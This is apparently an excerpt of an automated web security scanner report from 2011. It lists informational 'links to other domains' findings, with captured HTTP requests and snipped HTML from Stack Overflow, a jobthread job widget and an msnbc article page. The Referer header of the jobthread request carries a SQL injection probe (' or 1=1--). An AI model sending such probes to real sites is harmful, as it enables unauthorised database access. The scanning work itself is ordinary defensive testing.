http://webapps.stackexchange.com/
http://webmasters.stackexchange.com/
https://www.myopenid.com/signup?affiliate_id=46486

Request

GET /users/login?returnurl=%2fusers HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/users
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.4.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Set-Cookie: gauthed=; expires=Sat, 29-Jan-2011 15:12:49 GMT; path=/
Date: Sun, 30 Jan 2011 15:12:49 GMT
Content-Length: 14133

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Log In - Stack Overflow</title>

<link rel="stylesheet" type="text/css" href="http://sstatic.net/stackoverflow/all.css?v=90776b57f91f">
<link rel="shortcut icon" href="http://sstatic.net/stackoverflow/img/favicon.ico">
<link rel="apple-touch-icon" href="http://sstatic.net/stackoverflow/img/apple-touch-icon.png">
<link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript" src="http://sstatic.net/js/master.min.js?v=e8eb0725b4bd"></script>
...[SNIP]...
<meta http-equiv="X-XRDS-Location" content="http://stackoverflow.com/yadis">

<link rel="stylesheet" href="http://sstatic.net/openid.css?v=3">
<script type="text/javascript" src="http://sstatic.net/Js/third-party/openid-jquery.js?v=7"></script>
...[SNIP]...
<div id="portalLink">

<a class="genu" href="http://stackexchange.com">Stack Exchange</a>
...[SNIP]...
<p>OpenID is a service that allows you to log on to many different websites using a single identity.
Find out <a href="http://openid.net/what/">more about OpenID</a> and <a href="http://openid.net/get/">how to get an OpenID enabled account</a>
...[SNIP]...
<b style="font-size:130%"><a href="https://www.myopenid.com/signup?affiliate_id=46486">click here to sign up</a>
...[SNIP]...
<p class="ar">
<a href="http://openid.net/what/" target="_blank">learn more »</a>
...[SNIP]...
</a> |

<a href="http://data.stackexchange.com">data</a> |
<a href="http://itc.conversationsnetwork.org/series/stackoverflow.html">podcast</a>
...[SNIP]...
</a> |
<a href="http://engine.adzerk.net/redirect/0/2776/2751/0/4de3c60f719c4dfcb1a57531c7050090/0">advertising info</a>
...[SNIP]...
</span> <a href="http://stackapps.com">api/apps</a>
...[SNIP]...
</span> <a href="http://serverfault.com">serverfault.com</a>
...[SNIP]...
</span> <a href="http://superuser.com">superuser.com</a>
...[SNIP]...
</span> <a href="http://area51.stackexchange.com">area 51</a>
...[SNIP]...
</span> <a href="http://webapps.stackexchange.com">webapps</a>
...[SNIP]...
</span> <a href="http://gaming.stackexchange.com">gaming</a>
...[SNIP]...
</span> <a href="http://askubuntu.com">ubuntu</a>
...[SNIP]...
</span> <a href="http://webmasters.stackexchange.com">webmasters</a>
...[SNIP]...
</span> <a href="http://cooking.stackexchange.com">cooking</a>
...[SNIP]...
</span> <a href="http://gamedev.stackexchange.com">game development</a>
...[SNIP]...
</span> <a href="http://math.stackexchange.com">math</a>
...[SNIP]...
</span> <a href="http://photo.stackexchange.com">photography</a>
...[SNIP]...
</span> <a href="http://stats.stackexchange.com">stats</a>
...[SNIP]...
</span> <a href="http://tex.stackexchange.com">tex</a>
...[SNIP]...
</span> <a href="http://english.stackexchange.com">english</a>
...[SNIP]...
</span> <a href="http://cstheory.stackexchange.com">theoretical cs</a>
...[SNIP]...
</span> <a href="http://programmers.stackexchange.com">programmers</a>
...[SNIP]...
</span> <a href="http://unix.stackexchange.com">unix</a>
...[SNIP]...
</span> <a href="http://apple.stackexchange.com">apple</a>
...[SNIP]...
<div id="footer-flair">
<a href="http://creativecommons.org/licenses/by-sa/2.5/" class="cc-wiki-link"></a>
...[SNIP]...
</a> licensed under <a href="http://creativecommons.org/licenses/by-sa/2.5/" rel="license">cc-wiki</a>
...[SNIP]...
<div id="noscript-warning">Stack Overflow works best with JavaScript enabled<img src="http://pixel.quantserve.com/pixel/p-c1rF4kxgLUzNc.gif" alt="" class="dno"></div>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

22.340. http://syndication.jobthread.com/jt/syndication/page.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://syndication.jobthread.com
Path:	/jt/syndication/page.php

Issue detail

The page was loaded from a URL containing a query string:

http://syndication.jobthread.com/jt/syndication/page.php?url_directory=&type=jobroll&s_domain_name=jobs.popsci.com&num_jobs=3&num_featured_jobs=0&display_method=default&template_name=popsci1&version=2.0

The response contains the following links to other domains:

http://jobs.popsci.com/
http://jobs.popsci.com/job/senior-level-ii-support-dallas-tx-frontline-source-group-529b8b975d/?d=1&source=jobroll
http://jobs.popsci.com/job/test-engineer-plano-tx-frontline-source-group-1e9dc02e44/?d=1&source=jobroll
http://jobs.popsci.com/job/warehouse-engineer-farmers-branch-tx-frontline-source-group-647f94c9ac/?d=1&source=jobroll
http://jobs.popsci.com/post

Request

GET /jt/syndication/page.php?url_directory=&type=jobroll&s_domain_name=jobs.popsci.com&num_jobs=3&num_featured_jobs=0&display_method=default&template_name=popsci1&version=2.0 HTTP/1.1
Host: syndication.jobthread.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:16:05 GMT
Server: Apache/2
Vary: Host,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1723

document.write('<div class="content"><div style="background:url(\'http://static.jobthread.com/files/site_images/727999/727999_popsci-jobs-widget.png\') no-repeat 0 0;height:24px;width:340px;"></div><div style="margin:5px;"> <a href="http://jobs.popsci.com/job/senior-level-ii-support-dallas-tx-frontline-source-group-529b8b975d/?d=1&source=jobroll">Senior Level II Support</a>
...[SNIP]...
<br style="margin-bottom:10px;"> <a href="http://jobs.popsci.com/job/warehouse-engineer-farmers-branch-tx-frontline-source-group-647f94c9ac/?d=1&source=jobroll">Warehouse Engineer</a>
...[SNIP]...
<br style="margin-bottom:10px;"> <a href="http://jobs.popsci.com/job/test-engineer-plano-tx-frontline-source-group-1e9dc02e44/?d=1&source=jobroll">Test Engineer</a>
...[SNIP]...
<div style="float:left;clear:none;width:150px;margin-top:5px;"><a href="http://jobs.popsci.com/">More Jobs</a> | <a href="http://jobs.popsci.com/post">Post a Job</a>
...[SNIP]...

22.341. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The page was loaded from a URL containing a query string:

http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://alex-johnson.newsvine.com/
http://aquatone.newsvine.com/
http://athima-chansanchai.newsvine.com/
http://biggie2221635.newsvine.com/
http://blogs.discovermagazine.com/badastronomy/
http://blogs.discovermagazine.com/cosmicvariance/
http://blogs.discovermagazine.com/loom/
http://blogs.nature.com/news/thegreatbeyond/
http://boyle.newsvine.com/
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://curmudgeons.blogspot.com/
http://darthdon.newsvine.com/
http://dateline.msnbc.com/
http://davethedoubter.newsvine.com/
http://earthsky.org/
http://eurekalert.org/
http://hardball.msnbc.com/
http://helenaspopkin.newsvine.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://http/www.universetoday.com/
http://ingame.newsvine.com/
http://john875667.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/technolog/style.css?v=23247
http://ljrhodes.newsvine.com/
http://log.newsvine.com/poke.gif?x=0|26&get=c5942663&rand=1024084339&do=msnbc.redacted&rf=http%3A%2F%2Fwww.redacted%2F&ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::
http://malexj.tk/6M
http://malexj.wordpress.com/
http://michaelwann.newsvine.com/
http://minotown.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://nasaengineer.com/
http://news.discovery.com/
http://news.sciencemag.org/scienceinsider/
http://nightly.msnbc.com/
http://planetary.org/blog
http://platform.twitter.com/widgets.js
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://rachel.msnbc.com/
http://redtape.msnbc.com/
http://redtape.newsvine.com/
http://science.slashdot.org/
http://seedmagazine.com/
http://spacefellowship.com/
http://suzanne-choney.newsvine.com/
http://technolog2.newsvine.com/
http://today.msnbc.com/
http://toddkenreck.newsvine.com/
http://trueslant.com/milesobrien/
http://tv.msnbc.com/
http://twitter.com/
http://twitter.com/HelenASPopkin
http://twitter.com/MichaelWann
http://twitter.com/helenaspopkin
http://twitter.com/share
http://twitter.com/windabenedetti
http://twitter.com/wjrothman
http://tyler.newsvine.com/
http://waynej.newsvine.com/
http://wbenedetti.newsvine.com/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.collectspace.com/
http://www.dailygrail.com/
http://www.delish.com/
http://www.everyblock.com/
http://www.facebook.com/HelenASPopkin
http://www.facebook.com/pages/manage/
http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore
http://www.facebook.com/todd.kenreck
http://www.geekpress.com/
http://www.habitablezone.com/space/
http://www.hobbyspace.com/
http://www.hotmail.com/
http://www.livescience.com/
http://www.nasaspaceflight.com/
http://www.nasawatch.com/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.outofthecradle.net/
http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247
http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247
http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://www.popsci.com/
http://www.popularmechanics.com/
http://www.scidev.net/
http://www.scienceblog.com/cms/index.php
http://www.scienceblogs.com/
http://www.sciencenews.org/
http://www.scientificamerican.com/blog/observations/
http://www.signonsandiego.com/news/blogs/science-quest/
http://www.space.com/
http://www.spacedaily.com/
http://www.spacepolitics.com/
http://www.thecaseforpluto.com/
http://www.thecaseforpluto.com/cover.jpg
http://www.thespacereview.com/
http://www.transterrestrial.com/
http://www.twitter.com/MAlexJohnson
http://www.twitter.com/suzannechoney
http://www.unmannedspaceflight.com/
http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://twitter.com/ToddKenreck
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore?GT1=43001
Content-Type: text/html
Cache-Control: max-age=295
Date: Sun, 30 Jan 2011 16:58:40 GMT
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - T-Pain's Face
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://technolog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5942663&rand=1024084339&do=msnbc.redacted&rf=http%3A%2F%2Fwww.redacted%2F&ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5942669" data-contentId="5942669" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942669.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg" width="600" height="672" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Anyhoo … T-Pain really likes Facebook too … at least his latest tattoo indicates such. The Grammy-winning hip-hop artist shared a picture of his new ink on Twitter today, <a href="http://twitter.com/#!/NBTPAIN/status/30855244816584704">with this explanation </a>
...[SNIP]...
<div id="vine-inlinePhoto__5942671" data-contentId="5942671" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:238px;"><img id="helenaspopkin/5942671.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg" width="238" height="320" alt="" />
...[SNIP]...
</param><embed src="http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Follow her on <a href="http://twitter.com/helenaspopkin"><span>
...[SNIP]...
</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><span>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" data-Text="T-Pain's Facebook tattoo so hardcore, it's hexacore!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div class="normal"><a href="http://biggie2221635.newsvine.com/">biggie-2221635</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="newsvine"><a href="http://tyler.newsvine.com/">tyler</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://waynej.newsvine.com/">waynejohn</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MInOTown.newsvine.com/">M In O Town</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ljrhodes.newsvine.com/">L.J. Rhodes</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://John875667.newsvine.com/">John-875667</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://aquatone.newsvine.com/">aquatone</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://michaelwann.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/MichaelWann">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://technolog2.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg" width="60" height="60" /></a>
...[SNIP]...
from Time and the NYT to the notorious tech blog Gizmodo, where he was features editor for three years. He is not an Apple fanboy, but sometimes he is mistaken for one. You can stalk him on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/wjrothman">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://helenaspopkin.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/HelenASPopkin">Follow on Twitter</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/HelenASPopkin">Become a fan on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://suzanne-choney.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://www.twitter.com/suzannechoney">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://alex-johnson.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://malexj.wordpress.com/">Editor at Large</a>
...[SNIP]...
<li class="follow on twitter"><a href="http://www.twitter.com/MAlexJohnson">Follow on Twitter</a>
...[SNIP]...
<li class="follow on facebook"><a href="http://malexj.tk/6M">Follow on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://redtape.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
